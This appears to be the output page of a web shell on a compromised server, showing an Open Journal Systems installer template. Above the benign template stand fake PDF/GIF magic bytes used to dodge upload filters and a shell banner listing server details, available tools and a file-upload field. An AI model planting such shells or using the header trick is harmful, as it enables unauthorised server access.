%PDF-1.7 GIF89;
| Server IP : 104.20.45.2 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/JetliJournal/templates/install/ |
Upload File : |
{**
* templates/install/upgradeComplete.tpl
*
* Copyright (c) 2013-2015 Simon Fraser University Library
* Copyright (c) 2000-2015 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Display confirmation of successful upgrade.
* If necessary, will also display new config file contents if config file could not be written.
*
*}
{strip}
{assign var="pageTitle" value="installer.ojsUpgrade"}
{include file="common/header.tpl"}
{/strip}
{translate key="installer.upgradeComplete" version=$newVersion->getVersionString()}
{if !empty($notes)}
<div id="releaseNotes">
<h4>{translate key="installer.releaseNotes"}</h4>
{foreach from=$notes item=note}
<p><pre style="font-size: 125%">{$note|escape}</pre></p>
{/foreach}
</div>
{/if}
{if $writeConfigFailed}
<div id="writeConfigFailed">
{translate key="installer.overwriteConfigFileInstructions"}
<form action="#">
<p>
{translate key="installer.contentsOfConfigFile"}:<br />
<textarea name="config" cols="80" rows="20" class="textArea" style="font-family: Courier,'Courier New',fixed-width">{$configFileContents|escape}</textarea>
</p>
</form>
</div>{* writeConfigFailed *}
{/if}
{include file="common/footer.tpl"}